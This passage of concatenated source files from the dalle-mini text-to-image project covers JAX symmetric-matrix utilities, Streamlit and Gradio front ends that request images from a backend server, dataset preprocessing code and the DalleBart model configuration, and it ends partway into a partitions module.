dimensions for each matrix. Args: mat1: First matrix. mat2: Second matrix. axes: The axes over which to apply the product. precision: JAX precision to use for the multiplication. """ return jnp.tensordot(a=mat1, b=mat2, axes=axes, precision=precision) @functools.partial(jax.jit, static_argnames=("block_size", "axes", "precision")) def sliced_transposed_product( mat, block_size, axes=(-1,), precision=lax.Precision.DEFAULT, ): """Returns the blocked slices representing a symmetric contraction. Specifically, the output is a contraction of the input mat with itself, in the specified axes. Args: mat: The matrix for which we will compute a contraction with itself. block_size: The size of row blocks to compute. axes: Axes to use for the contraction. precision: The precision to use in each computation. Raises: ValueError: Raised when the specified block size does not evenly divide the number of rows of the input mat. """ rank = len(mat.shape) def _make_axis_positive(ax): assert -rank <= ax < rank return ax + rank if ax < 0 else ax positive_axes = [_make_axis_positive(ax) for ax in axes] assert len(positive_axes) == len(axes) remaining_axes = set(range(rank)) - set(positive_axes) assert len(remaining_axes) == 1 remaining_ax = remaining_axes.pop() num_rows = mat.shape[remaining_ax] if num_rows % block_size != 0: raise ValueError( "The row dimension must be divisible by block_size. " f"Instead got row dimension={num_rows} and block_size={block_size}." ) block_rows = [] for i in range(num_rows // block_size): start_indices = [0] * rank start_indices[remaining_ax] = i * block_size slice_sizes = list(mat.shape) slice_sizes[remaining_ax] = block_size slice_sizes_full = list(mat.shape) slice_sizes_full[remaining_ax] = (i + 1) * block_size block_rows.append( product_with_transpose( lax.dynamic_slice( mat, start_indices=start_indices, slice_sizes=slice_sizes ), lax.dynamic_slice( mat, start_indices=[0] * rank, slice_sizes=slice_sizes_full ), axes=(axes, axes), precision=precision, ) ) return SlicedSymmetricMatrix(block_rows=block_rows) @functools.partial(jax.jit, static_argnames=("block_size", "axes", "precision")) def sliced_transposed_product_concat( mat, block_size, axes=(-1,), precision=lax.Precision.DEFAULT, ): """Returns the concatenated slices representing mat*mat^T. Args: mat: The matrix for which we will compute mat*mat^T. It does not need to be square, and may be batched. block_size: The size of row blocks to compute. axes: Axes to use for the contraction. precision: The precision to use in each computation. Raises: ValueError: Raised when the specified block size does not evenly divide the number of rows of the input mat. """ sliced_symmetric_matrix = sliced_transposed_product( mat=mat, block_size=block_size, axes=axes, precision=precision ) return jnp.concatenate(sliced_symmetric_matrix.block_rows, axis=-1) @jax.jit def materialize_matrix(symmetric_matrix): """Returns a materialized symmetric matrix. Args: symmetric_matrix: the matrix represented by lower-triangular block slices. """ block_rows = symmetric_matrix.block_rows block_size = block_rows[0].shape[-2] num_blocks = len(block_rows) # Slice the lower-triangular and diagonal blocks into blocks. blocks = [ [ block_row[Ellipsis, i * block_size : (i + 1) * block_size] for i in range(k + 1) ] for k, block_row in enumerate(block_rows) ] # Generate the (off-diagonal) upper-triangular blocks. off_diags = [[] for _ in range(num_blocks - 1)] for k, block_row in enumerate(block_rows[1:]): for i in range(k + 1): off_diags[i].append( jnp.swapaxes( a=block_row[Ellipsis, i * block_size : (i + 1) * block_size], axis1=-1, axis2=-2, ) ) return jnp.block( [row + row_t for row, row_t in zip(blocks[:-1], off_diags)] + [blocks[-1]] ) @functools.partial(jax.jit, static_argnames="num_blocks") def materialize_matrix_from_concat( block_rows_concat, num_blocks=None, ): """Returns a materialized symmetric matrix from concatenated slices. Args: block_rows_concat: The matrix represented as the concatenated lower-triangular blocks. num_blocks: The number of block-rows used to represent the symmetric matrix. If not specified, it is inferred from the shape of block_rows_concat. """ if num_blocks is None: num_blocks = find_num_blocks(block_rows_concat) block_size = block_rows_concat.shape[-2] block_rows = [ block_rows_concat[ Ellipsis, (k * (k + 1)) // 2 * block_size : (((k + 1) * (k + 2)) // 2 + 1) * block_size, ] for k in range(num_blocks) ] return materialize_matrix(SlicedSymmetricMatrix(block_rows=block_rows)) @functools.partial(jax.jit, static_argnames=("alpha", "beta", "axes")) def update_sliced_rows( symmetric_matrix, mat, alpha, beta, axes=(-1,), ): """Implements the blocked equivalent of SYRK. Specifically, the symmetric matrix (represented using lower-triangular block rows) is updated using the sliced product of mat. Args: symmetric_matrix: The symmetric matrix to update. mat: The matrix to use for the update = mat * mat^T. The number of rows should match that of symmetric_matrix. alpha: The weight for the update. beta: The weight for the original symmetric matrix. axes: Axes to use for the contraction of the update. Returns: The updated rows of alpha * mat * mat^T + beta * symmetric_matrix. """ block_size = symmetric_matrix.block_rows[0].shape[-2] sym_prod = sliced_transposed_product(mat=mat, block_size=block_size, axes=axes) return SlicedSymmetricMatrix( block_rows=[ update * alpha + row * beta for update, row in zip(sym_prod.block_rows, symmetric_matrix.block_rows) ] ) def num_blocks_from_total_blocks(total_blocks): """Returns the number of blocks (i.e. block rows) from the total blocks. This is the inverse of the function x -> x*(x+1)/2. For example, the matrix M = [[A, B^T], [B, C]] may be represented using a total of 3 blocks ([A, B, C]). The number of corresponding block rows is 2. Args: total_blocks: The total blocks used to represent the matrix. """ num_blocks = np.round((np.sqrt(8 * total_blocks + 1) - 1) / 2).astype(np.int32) if (num_blocks * (num_blocks + 1)) / 2 != total_blocks: raise ValueError( f"total_blocks={total_blocks} does not correspond to " "a symmetric matrix. It must have the form total_blocks = x*(x+1)/2." ) return num_blocks def find_num_blocks(block_rows_concat): """Returns the number of (row) blocks representing the concatenated matrix. For example, an input with dimensions [256, 2560] represents 10 square blocks, which matches 4 lower-triangular block rows (1+2+3+4). So this function will return 4. Use ordinary numpy functions here so that the returned value is static. Args: block_rows_concat: The concatenated block array. Raises: ValueError: When the dimensions of the matrix do not correspond to a lower triangular block representation. """ # Compute the number of square blocks used to represent the matrix. total_blocks = block_rows_concat.shape[-1] / block_rows_concat.shape[-2] # Determine the number of block rows by inverting y = x*(x+1)/2. return num_blocks_from_total_blocks(total_blocks) @functools.partial(jax.jit, static_argnames="block_size") def slice_symmetric_matrix( mat, block_size, ): """Returns sliced row blocks. Args: mat: A symmetric matrix. block_size: The size of the row slices. """ num_rows = mat.shape[-2] num_cols = mat.shape[-1] if num_rows != num_cols: raise ValueError("mat is not square.") if num_rows % block_size != 0: raise ValueError( f"block size does not evenly divide rows. num_rows={num_rows}, block_size={block_size}" ) return SlicedSymmetricMatrix( block_rows=[ mat[ Ellipsis, i * block_size : (i + 1) * block_size, 0 : (i + 1) * block_size, ] for i in range(num_rows // block_size) ] ) @functools.partial(jax.jit, static_argnames="block_size") def slice_symmetric_matrix_concat( mat, block_size, ): """Returns the concatenated sliced row blocks. Args: mat: A symmetric matrix. block_size: The size of the row slices. """ sliced_symmetric_matrix = slice_symmetric_matrix(mat=mat, block_size=block_size) return jnp.concatenate(sliced_symmetric_matrix.block_rows, axis=-1) def sliced_matrix_diag(mat): """Returns the diagonal of the symmetric matrix. Args: mat: The symmetric matrix represented in concatenated block form. """ rows, cols = mat.shape total_blocks = cols // rows num_blocks = num_blocks_from_total_blocks(total_blocks) diags = [] for i in range(num_blocks): last_index = rows * ((i + 2) * (i + 1)) // 2 first_index = last_index - rows diags.append(jnp.diag(mat[Ellipsis, first_index:last_index])) return jnp.concatenate(diags, axis=-1) def diag_as_concat(diag, block_size): """Returns the representation of a diagonal matrix in symmetric block form. Args: diag: The 1D array for the diagonals. block_size: The size of blocks to use. Must divide the length of diag. """ assert len(diag.shape) == 1 # diag must be 1D. assert len(diag) % block_size == 0 num_diag_blocks = len(diag) // block_size blocks = [] for i in range(num_diag_blocks): blocks.append(jnp.zeros(shape=(block_size, block_size * i), dtype=diag.dtype)) blocks.append(jnp.diag(diag[i * block_size : (i + 1) * block_size])) return jnp.concatenate(blocks, axis=-1) def row_abs_maxes(mat): """Returns the max of the absolute values of the rows of the full matrix. For example the symmetric matrix M = [[1, 6], [6, 2]] is represented using mat = [1, 6, 2] with block_size = 1. In this case the function returns the aboslute row maxes of the original symmetric matrix, [6, 6]. Args: mat: The symmetric matrix represented as the concatenated blocks. """ rows, cols = mat.shape # Find col and row max for each block. col_maxes = [] row_maxes = [] for i in range(cols // rows): block = jnp.abs(mat[Ellipsis, i * rows : (i + 1) * rows]) col_maxes.append(jnp.max(block, axis=1)) row_maxes.append(jnp.max(block, axis=0)) # global row max from block maxes. num_blocks = num_blocks_from_total_blocks(cols // rows) maxes = [] for i in range(num_blocks): maxes.append( jnp.concatenate( row_maxes[(i * (i + 1) // 2) : ((i + 2) * (i + 1) // 2)] + [ col_maxes[((j + 1) * (j + 2)) // 2 - (j - i + 1)] for j in range(i + 1, num_blocks) ], axis=-1, ) ) return jnp.max(jnp.stack(maxes), axis=0) def times_vector(mat, vec): """Returns the symmetric block-concatenated matrix multiplied by a vector. Specifically, each value in the vector is multiplied by a row of the full matrix. That is, the vector is broadcast and multiplied element-wise. Note this would be the transpose of full_mat * vec if full_mat represented the full symmetric matrix. Args: mat: The symmetric matrix represented as the concatenated blocks. vec: The vector, having the same dimension as the materialized matrix. """ rows, cols = mat.shape num_blocks = num_blocks_from_total_blocks(cols // rows) multiplied = [] for i in range(num_blocks): mat_block = mat[ Ellipsis, rows * ((i + 1) * i) // 2 : rows * ((i + 1) * (i + 2)) // 2 ] vec_block = vec[Ellipsis, rows * i : rows * (i + 1)] multiplied.append(jnp.einsum("...ij,...i->ij", mat_block, vec_block)) return jnp.concatenate(multiplied, axis=-1) File: app/streamlit/backend.py # Client requests to Dalle-Mini Backend server import base64 from io import BytesIO import requests from PIL import Image class ServiceError(Exception): def __init__(self, status_code): self.status_code = status_code def get_images_from_backend(prompt, backend_url): r = requests.post(backend_url, json={"prompt": prompt}) if r.status_code == 200: json = r.json() images = json["images"] images = [Image.open(BytesIO(base64.b64decode(img))) for img in images] version = json.get("version", "unknown") return {"images": images, "version": version} else: raise ServiceError(r.status_code) def get_model_version(url): r = requests.get(url) if r.status_code == 200: version = r.json()["version"] return version else: raise ServiceError(r.status_code) File: app/streamlit/app.py #!/usr/bin/env python # coding: utf-8 import streamlit as st from backend import ServiceError, get_images_from_backend st.sidebar.markdown( """ <style> .aligncenter { text-align: center; } </style> <p class="aligncenter"> <img src="https://raw.githubusercontent.com/borisdayma/dalle-mini/main/img/logo.png"/> </p> """, unsafe_allow_html=True, ) st.sidebar.markdown( """ ___ <p style='text-align: center'> DALL·E mini is an AI model that generates images from any prompt you give! </p> <p style='text-align: center'> Created by Boris Dayma et al. 2021-2022 <br/> <a href="https://github.com/borisdayma/dalle-mini" target="_blank">GitHub</a> | <a href="https://wandb.ai/dalle-mini/dalle-mini/reports/DALL-E-mini--Vmlldzo4NjIxODA" target="_blank">Project Report</a> </p> """, unsafe_allow_html=True, ) st.header("DALL·E mini") st.subheader("Generate images from text") prompt = st.text_input("What do you want to see?") DEBUG = False if prompt != "": container = st.empty() container.markdown( f""" <style> p {{ margin:0 }} div {{ margin:0 }} </style> <div data-stale="false" class="element-container css-1e5imcs e1tzin5v1"> <div class="stAlert"> <div role="alert" data-baseweb="notification" class="st-ae st-af st-ag st-ah st-ai st-aj st-ak st-g3 st-am st-b8 st-ao st-ap st-aq st-ar st-as st-at st-au st-av st-aw st-ax st-ay st-az st-b9 st-b1 st-b2 st-b3 st-b4 st-b5 st-b6"> <div class="st-b7"> <div class="css-whx05o e13vu3m50"> <div data-testid="stMarkdownContainer" class="css-1ekf893 e16nr0p30"> <img src="https://raw.githubusercontent.com/borisdayma/dalle-mini/main/app/streamlit/img/loading.gif" width="30"/> Generating predictions for: <b>{prompt}</b> </div> </div> </div> </div> </div> </div> <small><i>Predictions may take up to 5mn under high load. Please stand by.</i></small> """, unsafe_allow_html=True, ) try: backend_url = st.secrets["BACKEND_SERVER"] + "/generate" response = get_images_from_backend(prompt, backend_url) selected = response["images"] version = response["version"] margin = 0.1 # for better position of zoom in arrow n_columns = 3 cols = st.columns([1] + [margin, 1] * (n_columns - 1)) for i, img in enumerate(selected): cols[(i % n_columns) * 2].image(img) container.markdown(f"**{prompt}**") # st.sidebar.markdown( # f"<small><center>{version}</center></small>", unsafe_allow_html=True # ) # st.markdown( # f""" # These results have been obtained using model `{version}` from [an ongoing training run](https://wandb.ai/dalle-mini/dalle-mini/runs/mheh9e55). # """ # ) st.button("Again!", key="again_button") except ServiceError as error: container.text(f"Service unavailable, status: {error.status_code}") except KeyError: if DEBUG: container.markdown( """ **Error: BACKEND_SERVER unset** Please, create a file called `.streamlit/secrets.toml` inside the app's folder and include a line to configure the server URL: ``` BACKEND_SERVER="<server url>" ``` """ ) else: container.markdown( "Error -5, please try again or [report it](mailto:[email protected])." ) File: app/gradio/backend.py # Client requests to Dalle-Mini Backend server import base64 from io import BytesIO import requests from PIL import Image class ServiceError(Exception): def __init__(self, status_code): self.status_code = status_code def get_images_from_backend(prompt, backend_url): r = requests.post(backend_url, json={"prompt": prompt}) if r.status_code == 200: json = r.json() images = json["images"] images = [Image.open(BytesIO(base64.b64decode(img))) for img in images] version = json.get("version", "unknown") return {"images": images, "version": version} else: raise ServiceError(r.status_code) def get_model_version(url): r = requests.get(url) if r.status_code == 200: version = r.json()["version"] return version else: raise ServiceError(r.status_code) File: app/gradio/app.py #!/usr/bin/env python # coding: utf-8 import os import gradio as gr from backend import get_images_from_backend block = gr.Blocks(css=".container { max-width: 800px; margin: auto; }") backend_url = os.environ["BACKEND_SERVER"] + "/generate" def infer(prompt): response = get_images_from_backend(prompt, backend_url) return response["images"] with block: gr.Markdown("<h1><center>DALL·E mini</center></h1>") gr.Markdown( "DALL·E mini is an AI model that generates images from any prompt you give!" ) with gr.Group(): with gr.Box(): with gr.Row().style(mobile_collapse=False, equal_height=True): text = gr.Textbox( label="Enter your prompt", show_label=False, max_lines=1 ).style( border=(True, False, True, True), margin=False, rounded=(True, False, False, True), container=False, ) btn = gr.Button("Run").style( margin=False, rounded=(False, True, True, False), ) gallery = gr.Gallery(label="Generated images", show_label=False).style( grid=[3], height="auto" ) text.submit(infer, inputs=text, outputs=gallery) btn.click(infer, inputs=text, outputs=gallery) gr.Markdown( """___ <p style='text-align: center'> Created by <a href="https://twitter.com/borisdayma" target="_blank">Boris Dayma</a> et al. 2021-2022 <br/> <a href="https://github.com/borisdayma/dalle-mini" target="_blank">GitHub</a> | <a href="https://wandb.ai/dalle-mini/dalle-mini/reports/DALL-E-mini-Generate-images-from-any-text-prompt--VmlldzoyMDE4NDAy" target="_blank">Project Report</a> </p>""" ) block.launch(enable_queue=False) File: src/dalle_mini/__init__.py __version__ = "0.1.5" from .model import DalleBart, DalleBartProcessor File: src/dalle_mini/data.py import random from dataclasses import dataclass, field from functools import partial from pathlib import Path import jax import jax.numpy as jnp import numpy as np from braceexpand import braceexpand from datasets import Dataset, load_dataset from .model.text import TextNormalizer @dataclass class Dataset: dataset_repo_or_path: str train_file: str = None validation_file: str = None streaming: bool = True use_auth_token: bool = False text_column: str = "caption" encoding_column: str = "encoding" max_train_samples: int = None max_eval_samples: int = None preprocessing_num_workers: int = None overwrite_cache: bool = False do_train: bool = False do_eval: bool = True seed_dataset: int = None shard_by_host: bool = False blank_caption_prob: float = 0.0 clip_score_column: str = "clip_score" min_clip_score: float = None max_clip_score: float = None filter_column: str = None filter_value: str = None multi_eval_ds: bool = False train_dataset: Dataset = field(init=False) eval_dataset: Dataset = field(init=False) other_eval_datasets: list = field(init=False) rng_dataset: jnp.ndarray = field(init=False) multi_hosts: bool = field(init=False) def __post_init__(self): if self.seed_dataset is None: # create a random seed self.seed_dataset = random.randint(0, 2**32 - 1) # set numpy rng self.np_rng = np.random.default_rng(self.seed_dataset) self.multi_hosts = jax.process_count() > 1 # feed blank captions only in streaming mode for now # otherwise dataset could be cached with same blanked captions if self.blank_caption_prob: assert ( self.streaming is True ), "blank_caption_prob can only be used in streaming mode" # define data_files if self.train_file is not None or self.validation_file is not None: # accept braceexpand notation for k in ["train_file", "validation_file"]: f = getattr(self, k) if isinstance(f, str): setattr(self, k, list(braceexpand(f))) # for list of files, split training data shards by host if ( isinstance(self.train_file, list) and self.multi_hosts and self.shard_by_host ): self.train_file = self.train_file[ jax.process_index() :: jax.process_count() ] data_files = { "train": self.train_file, "validation": self.validation_file, } else: data_files = None # multiple validation datasets if self.multi_eval_ds: assert Path( self.dataset_repo_or_path ).is_dir(), f"{self.dataset_repo_or_path} is not a directory, required for multi_eval_ds" data_files = { split.name: [str(f) for f in split.glob("*.parquet")] for split in Path(self.dataset_repo_or_path).glob("*") } # rename "valid" to "validation" if present for consistency if "valid" in data_files: data_files["validation"] = data_files["valid"] del data_files["valid"] self.dataset_repo_or_path = "parquet" # load dataset dataset = load_dataset( self.dataset_repo_or_path, data_files=data_files, streaming=self.streaming, use_auth_token=self.use_auth_token, ) if self.do_train: if "train" not in dataset: raise ValueError("Training requires a training dataset") self.train_dataset = dataset["train"] if self.max_train_samples is not None: self.train_dataset = ( self.train_dataset.take(self.max_train_samples) if self.streaming else self.train_dataset.select(range(self.max_train_samples)) ) if self.do_eval: if "validation" not in dataset: raise ValueError("Evaluating requires a validation dataset") self.eval_dataset = dataset["validation"] if self.max_eval_samples is not None: self.eval_dataset = ( self.eval_dataset.take(self.max_eval_samples) if self.streaming else self.eval_dataset.select(range(self.max_eval_samples)) ) # other eval datasets other_eval_splits = dataset.keys() - {"train", "validation"} self.other_eval_datasets = { split: dataset[split] for split in other_eval_splits } def preprocess(self, tokenizer, config): # get required config variables decoder_start_token_id = config.decoder_start_token_id normalize_text = config.normalize_text max_length = config.max_text_length if self.streaming: # we need to shuffle early in streaming mode if hasattr(self, "train_dataset"): self.train_dataset = self.train_dataset.shuffle( buffer_size=5000, seed=self.seed_dataset ) else: self.rng_dataset = jax.random.PRNGKey(self.seed_dataset) # filter data partial_filter_function = partial( filter_function, filter_column=self.filter_column, filter_value=self.filter_value, clip_score_column=self.clip_score_column, min_clip_score=self.min_clip_score, max_clip_score=self.max_clip_score, ) for ds in ["train_dataset", "eval_dataset"]: if hasattr(self, ds): setattr( self, ds, ( getattr(self, ds).filter(partial_filter_function) if self.streaming else getattr(self, ds).filter( partial_filter_function, num_proc=self.preprocessing_num_workers, load_from_cache_file=not self.overwrite_cache, desc="Filtering datasets", ) ), ) if hasattr(self, "other_eval_datasets"): self.other_eval_datasets = { split: ( ds.filter(partial_filter_function) if self.streaming else ds.filter( partial_filter_function, num_proc=self.preprocessing_num_workers, load_from_cache_file=not self.overwrite_cache, desc="Filtering datasets", ) ) for split, ds in self.other_eval_datasets.items() } # normalize text if normalize_text: text_normalizer = TextNormalizer() partial_normalize_function = partial( normalize_function, text_column=self.text_column, text_normalizer=text_normalizer, ) for ds in ["train_dataset", "eval_dataset"]: if hasattr(self, ds): setattr( self, ds, ( getattr(self, ds).map(partial_normalize_function) if self.streaming else getattr(self, ds).map( partial_normalize_function, num_proc=self.preprocessing_num_workers, load_from_cache_file=not self.overwrite_cache, desc="Normalizing datasets", ) ), ) if hasattr(self, "other_eval_datasets"): self.other_eval_datasets = { split: ( ds.map(partial_normalize_function) if self.streaming else ds.map( partial_normalize_function, num_proc=self.preprocessing_num_workers, load_from_cache_file=not self.overwrite_cache, desc="Normalizing datasets", ) ) for split, ds in self.other_eval_datasets.items() } # blank captions if self.blank_caption_prob: partial_blank_caption_function = partial( blank_caption_function, text_column=self.text_column, blank_caption_prob=self.blank_caption_prob, rng=self.np_rng, ) if hasattr(self, "train_dataset"): self.train_dataset = ( self.train_dataset.map(partial_blank_caption_function) if self.streaming else self.train_dataset.map( partial_blank_caption_function, num_proc=None if self.seed_dataset else self.preprocessing_num_workers, load_from_cache_file=False, desc="Blanking some captions", ) ) # preprocess partial_preprocess_function = partial( preprocess_function, tokenizer=tokenizer, text_column=self.text_column, encoding_column=self.encoding_column, max_length=max_length, decoder_start_token_id=decoder_start_token_id, ) for ds in ["train_dataset", "eval_dataset"]: if hasattr(self, ds): setattr( self, ds, ( getattr(self, ds).map( partial_preprocess_function, batched=True, remove_columns=[ self.text_column, self.encoding_column, ], ) if self.streaming else getattr(self, ds).map( partial_preprocess_function, batched=True, remove_columns=getattr(ds, "column_names"), num_proc=self.preprocessing_num_workers, load_from_cache_file=not self.overwrite_cache, desc="Preprocessing datasets", ) ), ) if hasattr(self, "other_eval_datasets"): self.other_eval_datasets = { split: ( ds.map( partial_preprocess_function, batched=True, remove_columns=[ self.text_column, self.encoding_column, ], ) if self.streaming else ds.map( partial_preprocess_function, batched=True, remove_columns=getattr(ds, "column_names"), num_proc=self.preprocessing_num_workers, load_from_cache_file=not self.overwrite_cache, desc="Preprocessing datasets", ) ) for split, ds in self.other_eval_datasets.items() } def dataloader(self, split, batch_size, epoch=None): def _dataloader_datasets_non_streaming( dataset: Dataset, rng: jax.random.PRNGKey = None, ): """ Returns batches of size `batch_size` from truncated `dataset`, sharded over all local devices. Shuffle batches if rng is set. """ steps_per_epoch = len(dataset) // batch_size if rng is not None: batch_idx = jax.random.permutation(rng, len(dataset)) else: batch_idx = jnp.arange(len(dataset)) batch_idx = batch_idx[ : steps_per_epoch * batch_size ] # Skip incomplete batch. batch_idx = batch_idx.reshape((steps_per_epoch, batch_size)) for idx in batch_idx: batch = dataset[idx] batch = {k: jnp.array(v) for k, v in batch.items()} yield batch def _dataloader_datasets_streaming( dataset: Dataset, epoch: int, ): keys = ["input_ids", "attention_mask", "labels", "decoder_input_ids"] batch = {k: [] for k in keys} first_loop = True # stop after one loop in some cases while (self.multi_hosts and split == "train") or first_loop: # in multi-host, we run forever (no epoch) as hosts need to stop # at the same time and training data may not be split equally # For validation data we put the entire batch on each host and then # keep only the one specific to each host (could be improved but not necessary) if epoch is not None: assert split == "train" # reshuffle training data at each epoch dataset.set_epoch(epoch) epoch += 1 for item in dataset: for k in keys: batch[k].append(item[k]) if len(batch[keys[0]]) == batch_size: batch = {k: jnp.array(v) for k, v in batch.items()} yield batch batch = {k: [] for k in keys} first_loop = False if split == "train": ds = self.train_dataset elif split == "eval": ds = self.eval_dataset else: ds = self.other_eval_datasets[split] if self.streaming: return _dataloader_datasets_streaming(ds, epoch) else: if split == "train": self.rng_dataset, input_rng = jax.random.split(self.rng_dataset) return _dataloader_datasets_non_streaming(ds, input_rng) @property def length(self): len_train_dataset, len_eval_dataset = None, None if self.streaming: # we don't know the length, let's just assume max_samples if defined if self.max_train_samples is not None: len_train_dataset = self.max_train_samples if self.max_eval_samples is not None: len_eval_dataset = self.max_eval_samples else: len_train_dataset = ( len(self.train_dataset) if hasattr(self, "train_dataset") else None ) len_eval_dataset = ( len(self.eval_dataset) if hasattr(self, "eval_dataset") else None ) return len_train_dataset, len_eval_dataset def shift_tokens_right(input_ids: np.array, decoder_start_token_id: int): """ Shift input ids one token to the right. """ shifted_input_ids = np.zeros(input_ids.shape) shifted_input_ids[:, 1:] = input_ids[:, :-1] shifted_input_ids[:, 0] = decoder_start_token_id return shifted_input_ids def blank_caption_function(example, text_column, blank_caption_prob, rng=None): if ( blank_caption_prob and (rng.random() if rng is not None else np.random.random()) < blank_caption_prob ): example[text_column] = "" return example def normalize_function(example, text_column, text_normalizer): example[text_column] = text_normalizer(example[text_column]) return example def filter_function( example, min_clip_score, max_clip_score, clip_score_column, filter_column, filter_value, ): if min_clip_score is not None and example[clip_score_column] < min_clip_score: return False if max_clip_score is not None and example[clip_score_column] > max_clip_score: return False if filter_column is not None and example[filter_column] != filter_value: return False return True def preprocess_function( examples, tokenizer, text_column, encoding_column, max_length, decoder_start_token_id, ): inputs = examples[text_column] # Setting padding="max_length" as we need fixed length inputs for jitted functions model_inputs = tokenizer( inputs, max_length=max_length, padding="max_length", truncation=True, return_tensors="np", ) # set up targets # Note: labels correspond to our target indices # decoder input ids are the same but shifted to the right with bos at the beginning (and without last token) labels = examples[encoding_column] labels = np.asarray(labels) # We need the labels, in addition to the decoder_input_ids, for the compute_loss function model_inputs["labels"] = labels # In our case, this prepends the bos token and removes the last one decoder_input_ids = shift_tokens_right(labels, decoder_start_token_id) model_inputs["decoder_input_ids"] = decoder_input_ids return model_inputs File: src/dalle_mini/model/configuration.py # coding=utf-8 # Copyright 2021 The Fairseq Authors and The HuggingFace Inc. team. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ DalleBart model configuration """ import warnings from transformers.configuration_utils import PretrainedConfig from transformers.utils import logging from .utils import PretrainedFromWandbMixin logger = logging.get_logger(__name__) class DalleBartConfig(PretrainedFromWandbMixin, PretrainedConfig): model_type = "dallebart" keys_to_ignore_at_inference = ["past_key_values"] attribute_map = { "num_attention_heads": "encoder_attention_heads", "hidden_size": "d_model", } def __init__( self, normalize_text=False, encoder_vocab_size=50264, image_vocab_size=16384, # encoded image token space image_length=256, # number of encoded tokens max_text_length=64, # max number of text tokens encoder_layers=12, encoder_ffn_dim=4096, encoder_attention_heads=16, decoder_layers=12, decoder_ffn_dim=4096, decoder_attention_heads=16, activation_function="gelu", d_model=1024, dropout=0.1, attention_dropout=0.0, activation_dropout=0.0, init_std=0.02, scale_embedding=False, gradient_checkpointing=True, use_scan=None, use_cache=True, is_encoder_decoder=True, forced_eos_token_id=None, tie_word_embeddings=False, # different modalities and sizes do_sample=True, # transformer variants use_bias=False, # use bias in attention and dense layers (except for lm_head) ln_type="layernorm", # layer normalization type, "rmsnorm", "layernorm" ln_positions="normformer", # layer normalization positions, "normformer", "swinv2", "cogview", "postln", "preln", "deepnet" (same as postln), "subln" use_head_scale=False, # used in NormFormer use_cosine_attention=False, # used in Swin v2 tau_init=0.05, # used only in cosine attention (Swin v2) use_absolute_position_embeddings=True, # default use_swin_position_embeddings=False, # used in Swin v1/v2 use_deepnet_scaling=False, # used in Deepnet use_subln_init=False, use_glu=True, # "GLU Variants Improve Transformer" use_alibi=False, # Not implemented yet - from "Train Short, Test Long: Attention with Linear Biases Enables Input Length Extrapolation" sinkhorn_iters=1, # used in SinkFormers use_final_ln_encoder=True, # final layer normalization in encoder use_final_ln_decoder=True, # final layer normalization in decoder # parameters that should not be necessary but could affect results force_ln_scale=False, # force scale in layernorm even when followed by dense layers **kwargs, ): # text normalizer self.normalize_text = normalize_text # transformer variants self.use_bias = use_bias assert ln_type in [ "rmsnorm", "layernorm", ], "ln_type must be 'rmsnorm' or 'layernorm'" self.ln_type = ln_type if ln_positions == "deepnet": ln_positions = "postln" assert ln_positions in [ "normformer", "swinv2", "cogview", "postln", "preln", "subln", ], "ln_positions must be 'normformer', 'swinv2', 'cogview', 'postln', 'preln', 'subln'" self.use_head_scale = use_head_scale assert use_alibi is False, "use_alibi is not supported yet" self.ln_positions = ln_positions self.use_cosine_attention = use_cosine_attention self.tau_init = tau_init self.use_absolute_position_embeddings = use_absolute_position_embeddings self.use_swin_position_embeddings = use_swin_position_embeddings self.use_deepnet_scaling = use_deepnet_scaling self.use_subln_init = use_subln_init self.use_glu = use_glu self.use_alibi = use_alibi self.sinkhorn_iters = sinkhorn_iters if ln_positions == "postln": assert ( use_final_ln_encoder ), "use_final_ln_encoder must be True when ln_positions is 'postln'" assert ( use_final_ln_decoder ), "use_final_ln_decoder must be True when ln_positions is 'postln'" self.use_final_ln_encoder = use_final_ln_encoder self.use_final_ln_decoder = use_final_ln_decoder self.force_ln_scale = force_ln_scale # common parameters self.encoder_vocab_size = encoder_vocab_size self.image_vocab_size = image_vocab_size self.image_length = image_length self.max_text_length = max_text_length self.d_model = d_model self.encoder_ffn_dim = encoder_ffn_dim self.encoder_layers = encoder_layers self.encoder_attention_heads = encoder_attention_heads self.decoder_ffn_dim = decoder_ffn_dim self.decoder_layers = decoder_layers self.decoder_attention_heads = decoder_attention_heads self.dropout = dropout self.attention_dropout = attention_dropout self.activation_dropout = activation_dropout self.activation_function = activation_function self.init_std = init_std self.use_cache = use_cache self.gradient_checkpointing = gradient_checkpointing # all layers are the same in most configurations self.use_scan = use_scan if use_scan is not None else ln_positions != "swinv2" assert not ( self.use_scan and ln_positions == "swinv2" ), "scan cannot be used with 'swinv2'" self.scale_embedding = ( scale_embedding # scale factor will be sqrt(d_model) if True ) # special token id's are appended to vocab if not provided decoder_start_token_id = kwargs.pop("decoder_start_token_id", image_vocab_size) bos_token_id = kwargs.pop("bos_token_id", image_vocab_size) pad_token_id = kwargs.pop("pad_token_id", image_vocab_size) eos_token_id = kwargs.pop("eos_token_id", image_vocab_size) # we generate to image_length + 1 (for bos) by default min_length = kwargs.pop("min_length", image_length + 1) max_length = kwargs.pop("max_length", image_length + 1) super().__init__( # args required in parent class is_encoder_decoder=is_encoder_decoder, tie_word_embeddings=tie_word_embeddings, forced_eos_token_id=forced_eos_token_id, decoder_start_token_id=decoder_start_token_id, bos_token_id=bos_token_id, pad_token_id=pad_token_id, eos_token_id=eos_token_id, min_length=min_length, max_length=max_length, do_sample=do_sample, **kwargs, ) # ensure backward compatibility for BART CNN models if self.forced_bos_token_id is None and kwargs.get( "force_bos_token_to_be_generated", False ): self.forced_bos_token_id = self.bos_token_id warnings.warn( f"Please make sure the config includes `forced_bos_token_id={self.bos_token_id}` in future versions." "The config can simply be saved and uploaded again to be fixed." ) File: src/dalle_mini/model/partitions.py import re from flax.core.frozen_dict import freeze from flax.traverse_util import flatten_dict, unflatten_dict from jax.experimental import PartitionSpec as P # utils adapted from https://github.com/google-research/google-research/blob/master/flax_models/t5x/partitions.py # Sentinels _unmatched = object() # For specifying empty leaf dict `{}` empty_dict = object() def _match(qs, ks): """Return True if regexes in qs match any window of strings in tuple ks.""" # compile regexes and force complete match qts = tuple(map(lambda x: re.compile(x + "$"), qs)) for i in range(len(ks) - len(qs) + 1): matches = [x.match(y) for x, y in zip(qts, ks[i:])] if matches and all(matches): return True return False def _replacement_rules(rules): def replace(key, val): for rule, replacement in rules: if _match(rule, key): return replacement return val return replace def _get_partition_rules(): return 